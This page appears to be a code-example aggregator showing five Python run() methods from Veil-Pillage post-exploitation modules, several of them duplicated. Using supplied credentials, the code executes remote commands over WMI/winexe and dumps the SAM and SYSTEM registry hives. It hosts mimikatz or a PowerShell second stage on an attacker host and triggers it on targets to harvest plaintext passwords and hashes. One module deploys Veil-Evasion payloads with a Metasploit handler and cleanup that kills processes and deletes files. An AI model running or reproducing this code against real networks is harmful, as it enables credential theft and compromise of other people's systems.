Exemplo n.º 1
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = 'powershell.exe -c "$a=42;$a"'
                powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42":
                    powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(
                    target,
                    username,
                    password,
                    secondStagePath,
                    lhost,
                    "",
                    triggerMethod="winexe",
                    outFile=out_file,
                    ssl=use_ssl,
                    noArch=True,
                )

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += (
                        "[*] Autograb.ps1 results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Autograb.ps1 failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
                print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
                securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
                samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/system", "w")
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/security", "w")
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/sam", "w")
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " saved to "
                    + saveLocation
                    + "\n"
                )

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult:
                    arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(
                    target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
                )

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                if out != "":
                    self.output += (
                        "[*] Mimikatz results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Mimikatz failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemplo n.º 2
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # the temporary output file gpp-password will write to
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # let's keep track of ALL plaintext credentials found
        allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []

        for target in self.targets:

            print "\n [*] Executing mimikatz on " + target
            # first, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username,
                                                       password, archCommand,
                                                       triggerMethod)

            # if there's a failure in this initial execution, go to the next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
                continue

            arch = "x86"
            if "64" in archResult: arch = "x64"

            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # now time for mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

            # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
            delivery_methods.hostTrigger(target,
                                         username,
                                         password,
                                         mimikatzPath,
                                         lhost,
                                         triggerMethod=triggerMethod,
                                         exeArgs=exeArgs)

            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target,
                              username,
                              password,
                              out_file,
                              delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                              out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        # append the total mimikatz creds if we have any
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemplo n.º 3
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg  = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = "powershell.exe -c \"$a=42;$a\""
                powershellResult = command_methods.executeResult(
                    target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42": powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(target,
                                                       username,
                                                       password,
                                                       secondStagePath,
                                                       lhost,
                                                       "",
                                                       triggerMethod="winexe",
                                                       outFile=out_file,
                                                       ssl=use_ssl,
                                                       noArch=True)

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
                                                  out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " +
                                    target,
                                    warning=True)
                print helpers.color(
                    "\n [*] Using reg.exe save method for hash dumping on " +
                    target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password,
                                               regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target,
                                         username,
                                         password,
                                         "C:\\Windows\\Temp\\system",
                                         delete=False)
                securityFile = smb.getFile(target,
                                           username,
                                           password,
                                           "C:\\Windows\\Temp\\security",
                                           delete=False)
                samFile = smb.getFile(target,
                                      username,
                                      password,
                                      "C:\\Windows\\Temp\\sam",
                                      delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/system', 'w')
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/security', 'w')
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/sam', 'w')
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target,
                                                      "creddump.txt", out)
                self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(
                    target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult: arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(target,
                                             username,
                                             password,
                                             mimikatzPath,
                                             lhost,
                                             triggerMethod="wmis",
                                             exeArgs=exeArgs)

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                                  out)

                if out != "":
                    self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
                allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
Exemplo n.º 4
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        transport = self.required_options["transport"][0]
        exe_path = self.required_options["exe_path"][0]
        lhost = self.required_options["lhost"][0]
        spawnHandler = self.required_options["spawn_handler"][0].lower()

        # quick sanity check for host/execute logic before we continue...
        if transport.lower() == "host":
            # if 'host' is given for a transport method but no lhost is specified
            if lhost == "none" or lhost == "":
                print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we're using Veil-Evasion for payload generation
        if exe_path.lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)


            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = exe_path

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # build the path to what the handler should be and
            handlerPath = settings.HANDLER_PATH + payloadPath.split(".")[0].split("/")[-1] + "_handler.rc"
            # command to spawn a new tab
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n [>] Press enter when handler is ready: ")


        # the hostTrigger method gets the whole target list so the smb hosting
        # server doesn't have to be setup/torn down for each target
        if transport.lower() == "host":
            # if 'host' is given for a transport method but no lhost is specified
            if lhost == "none":
                print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""
            else:
                # execute the host/trigger command with all the targers
                process = delivery_methods.hostTrigger(self.targets, username, password, payloadPath, lhost, triggerMethod)
                # build the command to kill that process
                killCmd = "taskkill /f /im "+process

                for target in self.targets:
                    self.output += "[*] Payload '\\\\"+lhost+"\\SYSTEM\\"+process+"' triggered using creds '"+username+":"+password+"' on : " + target + "\n"
                    # build our cleanup file to kill the process
                    self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"

        # assume upload/trigger
        else:
            for target in self.targets:
                # execute the upload/trigger command with all the targets
                deliveredName = delivery_methods.uploadTrigger(target, username, password, payloadPath, triggerMethod)
                self.output += "[*] Payload '"+deliveredName+"' uploaded and triggered using creds '"+username+":"+password+"' on : " + target + "\n"

                # build the command to kill that process
                killCmd = "taskkill /f /im "+deliveredName

                # build our cleanup file to kill the process and delete the binary
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
                # sleep for 3 seconds
                self.cleanup += "sleep|1\n"
                # delete the file off
                self.cleanup += "deletefile|"+target+"|"+username+"|"+password+"|C:\\Windows\\Temp\\"+deliveredName+"\n"
Exemplo n.º 5
0
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]
        
        # the temporary output file gpp-password will write to
        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file         

        # let's keep track of ALL plaintext credentials found
        allmsv, allkerberos, allwdigest, alltspkg  = [], [], [], []

        for target in self.targets:

            print "\n [*] Executing mimikatz on "+target
            # first, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)

            # if there's a failure in this initial execution, go to the next target
            if "error" in archResult:
                self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
                continue

            arch = "x86"
            if "64" in archResult: arch = "x64"

            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # now time for mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"

            # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

            print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
            time.sleep(int(delay))

            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)

            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

            if out != "":
                self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
            else:
                self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"

        # append the total mimikatz creds if we have any
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"